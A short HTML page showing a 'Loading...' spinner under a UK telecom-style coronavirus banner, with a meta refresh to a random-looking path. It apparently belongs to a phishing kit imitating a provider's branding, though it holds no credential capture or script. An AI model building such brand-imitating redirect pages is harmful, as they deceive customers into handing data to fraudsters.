<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="refresh" content="4; url=/rvvmgzanLD8wvzP2hjRE">
    <link rel="stylesheet" href="./css/main.css">
    <title>Document</title>
</head>
<body>
    <div class="top1">
        <img src="./img/logo.png" alt="">
    </div>
    <div class="top2">
        Coronavirus update: We’re keeping the UK connected. Despite best efforts some services may be disrupted.
    </div>
    
    <!-- ============================ -->
    <div style="padding: 90px 0; margin: 60px 0 ; display: grid; justify-content: center;" class="content">
        <img style="justify-self: center; width: 120px;" src="./img/Rolling-1s-200px (1).svg" alt="">
        <p style="text-align: center;">Loading...</p>
    </div>



    <div class="fot">
        <img src="./img/fot.PNG" alt="">
    </div>
</body>
</html>